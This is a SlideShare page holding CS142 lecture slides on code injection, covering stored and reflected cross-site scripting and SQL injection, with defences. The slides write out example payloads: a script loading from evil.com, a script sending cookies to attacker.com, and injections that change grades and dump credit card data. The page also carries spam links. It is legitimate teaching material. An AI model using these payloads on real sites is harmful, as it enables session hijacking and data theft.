SlideShare a Scribd company logo

CodeInjection.pdf

S
stephanedjeukam1

CodeInjection

Internet
1 of 17
Download to read offline
CS142 Lecture Notes - Code Injection Attacks Code Injection Attacks Mendel Rosenblum
CS142 Lecture Notes - Code Injection Attacks Untrusted Trusted Web Browser Web Server / Application server HTTP Storage System Internet LAN 2 CS142 Lecture Notes - HTML
CS142 Lecture Notes - Code Injection Attacks Consider adding HTML comments to our Photo App ● Easy change: Rather than {model.comment} do div.innerHtml = model.comment; ● What happens if someone inputs a comment with a script tag? <script src="http://www.evil.com/damage.js" /> ● Called a Cross Site Scripting Attack (XSS) Really unfortunate for us. Every user that views that photo/comments gets hurt. (consider following with a CSRF attack)
CS142 Lecture Notes - Code Injection Attacks Stored Cross Site Scripting Attack ● Attacker stores attacking code in a victim Web server, where it gets accessed by victim clients. Call a Stored Cross Site Scripting Attack ● On previous generations of web frameworks was a major attack loophole ○ Lots of stuffing things into innerHTML, bad escape processing ● Less so on JavaScript frameworks ○ Care is taken before stuffing things into the DOM
CS142 Lecture Notes - Code Injection Attacks Reflected Cross Site Scripting ● Attacker doesn't need to store attack on website, can just reflect it off the website. Call a Reflected Cross Site Scripting Attack ● Consider a website that shows the search term used (like our states view) ○ What happens if we store the search term in an innerHTML and an attacker tricks a user into searching for: Justin Bieber <img style="display:none" id="cookieMonster"> <script> img = document.getElementById("cookieMonster"); img.src = "http://attacker.com?cookie=" + encodeURIComponent(document.cookie); </script>
CS142 Lecture Notes - Code Injection Attacks Reflected Cross Site Scripting Attack ● How to get user to submit that URL? CSRF again: ● Step #1: lure user to attacker site: ○ Sponsored advertisement ○ Spam email ○ Facebook application ● Step #2: attacker HTML automatically loads the link in an invisible iframe
CS142 Lecture Notes - Code Injection Attacks Modern JavaScript frameworks have better defences ● Angular bind-html - Sanitizes HTML to remove script, etc. <div ng-bind-html="model.comment"></div> --- Safe ● Must explicitly tell Angular if you don't want it sanitized model.comment = $sce.trustAsHtml(model.comment) Strict Contextual Escaping (SCE) ● Effectively marks all the places you need to worry about ● ReactJS: No opinion -> half dozen options, search "reactjs sanitize html"
CS142 Lecture Notes - Code Injection Attacks Code Inject on the Server
CS142 Lecture Notes - Code Injection Attacks SQL DataBase query models ● Request processing for get students of a specified advisor var advisorName = routeParam.advisorName; var students = Student.find_by_sql( "SELECT students.* " + "FROM students, advisors " + "WHERE student.advisor_id = advisor.id " + "AND advisor.name = '" + advisorName + "'"); ● Called with advisorName of 'Jones' SELECT students.* FROM students, advisors WHERE student.advisor_id = advisor.id AND advisor.name = 'Jones'
CS142 Lecture Notes - Code Injection Attacks SQL Injection Attack - Update database ● What happens if the advisorName is: Jones'; UPDATE grades SET g.grade = 4.0 FROM grades g, students s WHERE g.student_id = s.id AND s.name = 'Smith ● The following query will be generated: SELECT students.* FROM students, advisors WHERE student.advisor_id = advisor.id AND advisor.name = 'Jones'; UPDATE grades SET g.grade = 4.0 FROM grades g, students s WHERE g.student_id = s.id AND s.name = 'Smith'
CS142 Lecture Notes - Code Injection Attacks SQL Injection Injection can also be used to extract sensitive information ● Modify existing query to retrieve different information ● Stolen information appears in "normal" Web output
CS142 Lecture Notes - Code Injection Attacks Consider a simple pizza company view order history
CS142 Lecture Notes - Code Injection Attacks Order history query to SQL database ● Order history request processing: var month = routeParam.month; var orders = Orders.find_by_sql( "SELECT pizza, toppings, quantity, date " + "FROM orders " + "WHERE user_id=" + user_id + "AND order_month= '" + month + "'"); ● Month parameter set to: October' AND 1=0 UNION SELECT name as pizza, card_num as toppings, exp_mon as quantity, exp_year as date FROM credit_cards WHERE name != '
CS142 Lecture Notes - Code Injection Attacks SQL Injection - Dump the database SELECT pizza, toppings, quantity, date FROM orders WHERE user_id=94412 AND order_month='October' AND 1=0 UNION SELECT name as pizza, card_num as toppings, exp_mon as quantity, exp_year as date FROM credit_cards WHERE name != ''
CS142 Lecture Notes - Code Injection Attacks Output the dump
CS142 Lecture Notes - Code Injection Attacks CardSystems hit by SQL injection attack ● CardSystems - Credit card payment processing company SQL injection attack in June 2005 Did in the company ● The Attack: Credit card #s stored unencrypted 263,000 credit card #s stolen from database 43 million credit card #s exposed
CS142 Lecture Notes - Code Injection Attacks Solutions ● Don't write SQL Student.findByAdvisorName(routeParam.advisorName); ● Use a framework that knows how to safely build sql commands: Student.find_by_sql("SELECT students.* " + "FROM students, advisors " + "WHERE student.advisor_id = advisor.id " + "AND advisor.name = ?", routeParam.advisorName);

Recommended

Secure coding in C#
Secure coding in C#Secure coding in C#
Secure coding in C#Siddharth Bezalwar
 
MiTM Attacks in Android Apps - TDC 2014
MiTM Attacks in Android Apps - TDC 2014MiTM Attacks in Android Apps - TDC 2014
MiTM Attacks in Android Apps - TDC 2014ivanjokerbr
 
suma cv
suma cvsuma cv
suma cvSuma ;)
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013Edouard de Lansalut
 
Abdullah AlGhamdi CV
Abdullah AlGhamdi CVAbdullah AlGhamdi CV
Abdullah AlGhamdi CVAbdullah Alghamdi
 
8 sql injection
8 sql injection8 sql injection
8 sql injectiondrewz lin
 
Web Security 101
Web Security 101Web Security 101
Web Security 101Michael Peters
 
SendGridDelivered_API_Workshop
SendGridDelivered_API_WorkshopSendGridDelivered_API_Workshop
SendGridDelivered_API_WorkshopSendGrid
 

Recommended

Secure coding in C#
Secure coding in C#Secure coding in C#
Secure coding in C#Siddharth Bezalwar
 
MiTM Attacks in Android Apps - TDC 2014
MiTM Attacks in Android Apps - TDC 2014MiTM Attacks in Android Apps - TDC 2014
MiTM Attacks in Android Apps - TDC 2014ivanjokerbr
 
suma cv
suma cvsuma cv
suma cvSuma ;)
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013Edouard de Lansalut
 
Abdullah AlGhamdi CV
Abdullah AlGhamdi CVAbdullah AlGhamdi CV
Abdullah AlGhamdi CVAbdullah Alghamdi
 
8 sql injection
8 sql injection8 sql injection
8 sql injectiondrewz lin
 
Web Security 101
Web Security 101Web Security 101
Web Security 101Michael Peters
 
SendGridDelivered_API_Workshop
SendGridDelivered_API_WorkshopSendGridDelivered_API_Workshop
SendGridDelivered_API_WorkshopSendGrid
 
FrontEnd.pdf
FrontEnd.pdfFrontEnd.pdf
FrontEnd.pdfstephanedjeukam1
 
MongoDB World 2018: Ch-Ch-Ch-Ch-Changes: Taking Your Stitch Application to th...
MongoDB World 2018: Ch-Ch-Ch-Ch-Changes: Taking Your Stitch Application to th...MongoDB World 2018: Ch-Ch-Ch-Ch-Changes: Taking Your Stitch Application to th...
MongoDB World 2018: Ch-Ch-Ch-Ch-Changes: Taking Your Stitch Application to th...MongoDB
 
21 05-2018
21 05-201821 05-2018
21 05-2018Praaveen Vr
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAbhinav Nair
 
JSFest 2019: Technology agnostic microservices at SPA frontend
JSFest 2019: Technology agnostic microservices at SPA frontendJSFest 2019: Technology agnostic microservices at SPA frontend
JSFest 2019: Technology agnostic microservices at SPA frontendVlad Fedosov
 
Suite Script 2.0 API Basics
Suite Script 2.0 API BasicsSuite Script 2.0 API Basics
Suite Script 2.0 API BasicsJimmy Butare
 
Detailed Developer Report.pdf
Detailed Developer Report.pdfDetailed Developer Report.pdf
Detailed Developer Report.pdfnalla14
 
Navjot_Resume_2017_Latest
Navjot_Resume_2017_LatestNavjot_Resume_2017_Latest
Navjot_Resume_2017_LatestNavjot Thakur
 
Defence
DefenceDefence
DefenceReduan Rafi
 
Protecting Users Against XSS-based Password Manager Abuse
Protecting Users Against XSS-based Password Manager AbuseProtecting Users Against XSS-based Password Manager Abuse
Protecting Users Against XSS-based Password Manager AbuseBen Stock
 
Angularjs practical project experiences with javascript development in a bank
Angularjs practical project experiences with javascript development in a bankAngularjs practical project experiences with javascript development in a bank
Angularjs practical project experiences with javascript development in a bankDavid Amend
 
Introduction to ASP.NET MVC 2
Introduction to ASP.NET MVC 2Introduction to ASP.NET MVC 2
Introduction to ASP.NET MVC 2Joe Wilson
 
ppt_project_group_2.ppt amnd project report
ppt_project_group_2.ppt amnd project reportppt_project_group_2.ppt amnd project report
ppt_project_group_2.ppt amnd project reportsobanmoriwala1
 
Starting from Scratch with the MEAN Stack
Starting from Scratch with the MEAN StackStarting from Scratch with the MEAN Stack
Starting from Scratch with the MEAN StackMongoDB
 
Reactive Application Using METEOR
Reactive Application Using METEORReactive Application Using METEOR
Reactive Application Using METEORNodeXperts
 
XSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareXSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareOmer Meshar
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooBinu Ramakrishnan
 
Intro to Web Development from Bloc.io
Intro to Web Development from Bloc.ioIntro to Web Development from Bloc.io
Intro to Web Development from Bloc.ioDouglas Wright
 
Tutorial: Building Your First App with MongoDB Stitch
Tutorial: Building Your First App with MongoDB StitchTutorial: Building Your First App with MongoDB Stitch
Tutorial: Building Your First App with MongoDB StitchMongoDB
 
2007 2-google hacking-report
2007 2-google hacking-report2007 2-google hacking-report
2007 2-google hacking-reportsunil kumar
 
HTTP.pdf
HTTP.pdfHTTP.pdf
HTTP.pdfstephanedjeukam1
 
Database.pdf
Database.pdfDatabase.pdf
Database.pdfstephanedjeukam1
 

More Related Content

Similar to CodeInjection.pdf

MongoDB World 2018: Ch-Ch-Ch-Ch-Changes: Taking Your Stitch Application to th...
MongoDB World 2018: Ch-Ch-Ch-Ch-Changes: Taking Your Stitch Application to th...MongoDB World 2018: Ch-Ch-Ch-Ch-Changes: Taking Your Stitch Application to th...
MongoDB World 2018: Ch-Ch-Ch-Ch-Changes: Taking Your Stitch Application to th...MongoDB
 
JSFest 2019: Technology agnostic microservices at SPA frontend
JSFest 2019: Technology agnostic microservices at SPA frontendJSFest 2019: Technology agnostic microservices at SPA frontend
JSFest 2019: Technology agnostic microservices at SPA frontendVlad Fedosov
 
Suite Script 2.0 API Basics
Suite Script 2.0 API BasicsSuite Script 2.0 API Basics
Suite Script 2.0 API BasicsJimmy Butare
 
Detailed Developer Report.pdf
Detailed Developer Report.pdfDetailed Developer Report.pdf
Detailed Developer Report.pdfnalla14
 
Navjot_Resume_2017_Latest
Navjot_Resume_2017_LatestNavjot_Resume_2017_Latest
Navjot_Resume_2017_LatestNavjot Thakur
 
Protecting Users Against XSS-based Password Manager Abuse
Protecting Users Against XSS-based Password Manager AbuseProtecting Users Against XSS-based Password Manager Abuse
Protecting Users Against XSS-based Password Manager AbuseBen Stock
 
Angularjs practical project experiences with javascript development in a bank
Angularjs practical project experiences with javascript development in a bankAngularjs practical project experiences with javascript development in a bank
Angularjs practical project experiences with javascript development in a bankDavid Amend
 
Introduction to ASP.NET MVC 2
Introduction to ASP.NET MVC 2Introduction to ASP.NET MVC 2
Introduction to ASP.NET MVC 2Joe Wilson
 
ppt_project_group_2.ppt amnd project report
ppt_project_group_2.ppt amnd project reportppt_project_group_2.ppt amnd project report
ppt_project_group_2.ppt amnd project reportsobanmoriwala1
 
Starting from Scratch with the MEAN Stack
Starting from Scratch with the MEAN StackStarting from Scratch with the MEAN Stack
Starting from Scratch with the MEAN StackMongoDB
 
Reactive Application Using METEOR
Reactive Application Using METEORReactive Application Using METEOR
Reactive Application Using METEORNodeXperts
 
XSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareXSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareOmer Meshar
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooBinu Ramakrishnan
 
Intro to Web Development from Bloc.io
Intro to Web Development from Bloc.ioIntro to Web Development from Bloc.io
Intro to Web Development from Bloc.ioDouglas Wright
 
Tutorial: Building Your First App with MongoDB Stitch
Tutorial: Building Your First App with MongoDB StitchTutorial: Building Your First App with MongoDB Stitch
Tutorial: Building Your First App with MongoDB StitchMongoDB
 
2007 2-google hacking-report
2007 2-google hacking-report2007 2-google hacking-report
2007 2-google hacking-reportsunil kumar
 

Similar to CodeInjection.pdf (20)

FrontEnd.pdf
FrontEnd.pdfFrontEnd.pdf
FrontEnd.pdf
 
MongoDB World 2018: Ch-Ch-Ch-Ch-Changes: Taking Your Stitch Application to th...
MongoDB World 2018: Ch-Ch-Ch-Ch-Changes: Taking Your Stitch Application to th...MongoDB World 2018: Ch-Ch-Ch-Ch-Changes: Taking Your Stitch Application to th...
MongoDB World 2018: Ch-Ch-Ch-Ch-Changes: Taking Your Stitch Application to th...
 
21 05-2018
21 05-201821 05-2018
21 05-2018
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
JSFest 2019: Technology agnostic microservices at SPA frontend
JSFest 2019: Technology agnostic microservices at SPA frontendJSFest 2019: Technology agnostic microservices at SPA frontend
JSFest 2019: Technology agnostic microservices at SPA frontend
 
Suite Script 2.0 API Basics
Suite Script 2.0 API BasicsSuite Script 2.0 API Basics
Suite Script 2.0 API Basics
 
Detailed Developer Report.pdf
Detailed Developer Report.pdfDetailed Developer Report.pdf
Detailed Developer Report.pdf
 
Navjot_Resume_2017_Latest
Navjot_Resume_2017_LatestNavjot_Resume_2017_Latest
Navjot_Resume_2017_Latest
 
Defence
DefenceDefence
Defence
 
Protecting Users Against XSS-based Password Manager Abuse
Protecting Users Against XSS-based Password Manager AbuseProtecting Users Against XSS-based Password Manager Abuse
Protecting Users Against XSS-based Password Manager Abuse
 
Angularjs practical project experiences with javascript development in a bank
Angularjs practical project experiences with javascript development in a bankAngularjs practical project experiences with javascript development in a bank
Angularjs practical project experiences with javascript development in a bank
 
Introduction to ASP.NET MVC 2
Introduction to ASP.NET MVC 2Introduction to ASP.NET MVC 2
Introduction to ASP.NET MVC 2
 
ppt_project_group_2.ppt amnd project report
ppt_project_group_2.ppt amnd project reportppt_project_group_2.ppt amnd project report
ppt_project_group_2.ppt amnd project report
 
Starting from Scratch with the MEAN Stack
Starting from Scratch with the MEAN StackStarting from Scratch with the MEAN Stack
Starting from Scratch with the MEAN Stack
 
Reactive Application Using METEOR
Reactive Application Using METEORReactive Application Using METEOR
Reactive Application Using METEOR
 
XSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malwareXSS: From alert(1) to crypto mining malware
XSS: From alert(1) to crypto mining malware
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at Yahoo
 
Intro to Web Development from Bloc.io
Intro to Web Development from Bloc.ioIntro to Web Development from Bloc.io
Intro to Web Development from Bloc.io
 
Tutorial: Building Your First App with MongoDB Stitch
Tutorial: Building Your First App with MongoDB StitchTutorial: Building Your First App with MongoDB Stitch
Tutorial: Building Your First App with MongoDB Stitch
 
2007 2-google hacking-report
2007 2-google hacking-report2007 2-google hacking-report
2007 2-google hacking-report
 

More from stephanedjeukam1

More from stephanedjeukam1 (10)

HTTP.pdf
HTTP.pdfHTTP.pdf
HTTP.pdf
 
Database.pdf
Database.pdfDatabase.pdf
Database.pdf
 
HTML.pdf
HTML.pdfHTML.pdf
HTML.pdf
 
Express.pdf
Express.pdfExpress.pdf
Express.pdf
 
Input.pdf
Input.pdfInput.pdf
Input.pdf
 
DOM.pdf
DOM.pdfDOM.pdf
DOM.pdf
 
CSS.pdf
CSS.pdfCSS.pdf
CSS.pdf
 
DOSAttacks.pdf
DOSAttacks.pdfDOSAttacks.pdf
DOSAttacks.pdf
 
0000 Syllabus.pdf
0000 Syllabus.pdf0000 Syllabus.pdf
0000 Syllabus.pdf
 
Events.pdf
Events.pdfEvents.pdf
Events.pdf
 

Recently uploaded

原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查ydyuyu
 
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样ayvbos
 
一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理F
 
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdfMatthew Sinclair
 
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查ydyuyu
 
Mira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call GirlsMira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call GirlsPriya Reddy
 
Ballia Escorts Service Girl ^ 9332606886, WhatsApp Anytime Ballia
Ballia Escorts Service Girl ^ 9332606886, WhatsApp Anytime BalliaBallia Escorts Service Girl ^ 9332606886, WhatsApp Anytime Ballia
Ballia Escorts Service Girl ^ 9332606886, WhatsApp Anytime Balliameghakumariji156
 
Best SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency DallasBest SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency DallasDigicorns Technologies
 
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdfpdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdfJOHNBEBONYAP1
 
Trump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts SweatshirtTrump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts Sweatshirtrahman018755
 
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime NagercoilNagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoilmeghakumariji156
 
20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdfMatthew Sinclair
 
Tadepalligudem Escorts Service Girl ^ 9332606886, WhatsApp Anytime Tadepallig...
Tadepalligudem Escorts Service Girl ^ 9332606886, WhatsApp Anytime Tadepallig...Tadepalligudem Escorts Service Girl ^ 9332606886, WhatsApp Anytime Tadepallig...
Tadepalligudem Escorts Service Girl ^ 9332606886, WhatsApp Anytime Tadepallig...meghakumariji156
 
Russian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi EscortsRussian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi EscortsMonica Sydney
 
Abu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu DhabiAbu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu DhabiMonica Sydney
 
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...gajnagarg
 
Call girls Service in Ajman 0505086370 Ajman call girls
Call girls Service in Ajman 0505086370 Ajman call girlsCall girls Service in Ajman 0505086370 Ajman call girls
Call girls Service in Ajman 0505086370 Ajman call girlsMonica Sydney
 
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC
 
一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理F
 

Recently uploaded (20)

原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
 
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
 
一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理
 
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
 
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
 
Mira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call GirlsMira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
 
Ballia Escorts Service Girl ^ 9332606886, WhatsApp Anytime Ballia
Ballia Escorts Service Girl ^ 9332606886, WhatsApp Anytime BalliaBallia Escorts Service Girl ^ 9332606886, WhatsApp Anytime Ballia
Ballia Escorts Service Girl ^ 9332606886, WhatsApp Anytime Ballia
 
Best SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency DallasBest SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency Dallas
 
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdfpdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
 
Trump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts SweatshirtTrump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts Sweatshirt
 
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime NagercoilNagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
 
call girls in Anand Vihar (delhi) call me [🔝9953056974🔝] escort service 24X7
call girls in Anand Vihar (delhi) call me [🔝9953056974🔝] escort service 24X7call girls in Anand Vihar (delhi) call me [🔝9953056974🔝] escort service 24X7
call girls in Anand Vihar (delhi) call me [🔝9953056974🔝] escort service 24X7
 
20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf
 
Tadepalligudem Escorts Service Girl ^ 9332606886, WhatsApp Anytime Tadepallig...
Tadepalligudem Escorts Service Girl ^ 9332606886, WhatsApp Anytime Tadepallig...Tadepalligudem Escorts Service Girl ^ 9332606886, WhatsApp Anytime Tadepallig...
Tadepalligudem Escorts Service Girl ^ 9332606886, WhatsApp Anytime Tadepallig...
 
Russian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi EscortsRussian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
 
Abu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu DhabiAbu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
 
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
 
Call girls Service in Ajman 0505086370 Ajman call girls
Call girls Service in Ajman 0505086370 Ajman call girlsCall girls Service in Ajman 0505086370 Ajman call girls
Call girls Service in Ajman 0505086370 Ajman call girls
 
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
 
一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理
 

CodeInjection.pdf

  • 1. CS142 Lecture Notes - Code Injection Attacks Code Injection Attacks Mendel Rosenblum
  • 2. CS142 Lecture Notes - Code Injection Attacks Untrusted Trusted Web Browser Web Server / Application server HTTP Storage System Internet LAN 2 CS142 Lecture Notes - HTML
  • 3. CS142 Lecture Notes - Code Injection Attacks Consider adding HTML comments to our Photo App ● Easy change: Rather than {model.comment} do div.innerHtml = model.comment; ● What happens if someone inputs a comment with a script tag? <script src="http://www.evil.com/damage.js" /> ● Called a Cross Site Scripting Attack (XSS) Really unfortunate for us. Every user that views that photo/comments gets hurt. (consider following with a CSRF attack)
  • 4. CS142 Lecture Notes - Code Injection Attacks Stored Cross Site Scripting Attack ● Attacker stores attacking code in a victim Web server, where it gets accessed by victim clients. Call a Stored Cross Site Scripting Attack ● On previous generations of web frameworks was a major attack loophole ○ Lots of stuffing things into innerHTML, bad escape processing ● Less so on JavaScript frameworks ○ Care is taken before stuffing things into the DOM
  • 5. CS142 Lecture Notes - Code Injection Attacks Reflected Cross Site Scripting ● Attacker doesn't need to store attack on website, can just reflect it off the website. Call a Reflected Cross Site Scripting Attack ● Consider a website that shows the search term used (like our states view) ○ What happens if we store the search term in an innerHTML and an attacker tricks a user into searching for: Justin Bieber <img style="display:none" id="cookieMonster"> <script> img = document.getElementById("cookieMonster"); img.src = "http://attacker.com?cookie=" + encodeURIComponent(document.cookie); </script>
  • 6. CS142 Lecture Notes - Code Injection Attacks Reflected Cross Site Scripting Attack ● How to get user to submit that URL? CSRF again: ● Step #1: lure user to attacker site: ○ Sponsored advertisement ○ Spam email ○ Facebook application ● Step #2: attacker HTML automatically loads the link in an invisible iframe
  • 7. CS142 Lecture Notes - Code Injection Attacks Modern JavaScript frameworks have better defences ● Angular bind-html - Sanitizes HTML to remove script, etc. <div ng-bind-html="model.comment"></div> --- Safe ● Must explicitly tell Angular if you don't want it sanitized model.comment = $sce.trustAsHtml(model.comment) Strict Contextual Escaping (SCE) ● Effectively marks all the places you need to worry about ● ReactJS: No opinion -> half dozen options, search "reactjs sanitize html"
  • 8. CS142 Lecture Notes - Code Injection Attacks Code Inject on the Server
  • 9. CS142 Lecture Notes - Code Injection Attacks SQL DataBase query models ● Request processing for get students of a specified advisor var advisorName = routeParam.advisorName; var students = Student.find_by_sql( "SELECT students.* " + "FROM students, advisors " + "WHERE student.advisor_id = advisor.id " + "AND advisor.name = '" + advisorName + "'"); ● Called with advisorName of 'Jones' SELECT students.* FROM students, advisors WHERE student.advisor_id = advisor.id AND advisor.name = 'Jones'
  • 10. CS142 Lecture Notes - Code Injection Attacks SQL Injection Attack - Update database ● What happens if the advisorName is: Jones'; UPDATE grades SET g.grade = 4.0 FROM grades g, students s WHERE g.student_id = s.id AND s.name = 'Smith ● The following query will be generated: SELECT students.* FROM students, advisors WHERE student.advisor_id = advisor.id AND advisor.name = 'Jones'; UPDATE grades SET g.grade = 4.0 FROM grades g, students s WHERE g.student_id = s.id AND s.name = 'Smith'
  • 11. CS142 Lecture Notes - Code Injection Attacks SQL Injection Injection can also be used to extract sensitive information ● Modify existing query to retrieve different information ● Stolen information appears in "normal" Web output
  • 12. CS142 Lecture Notes - Code Injection Attacks Consider a simple pizza company view order history
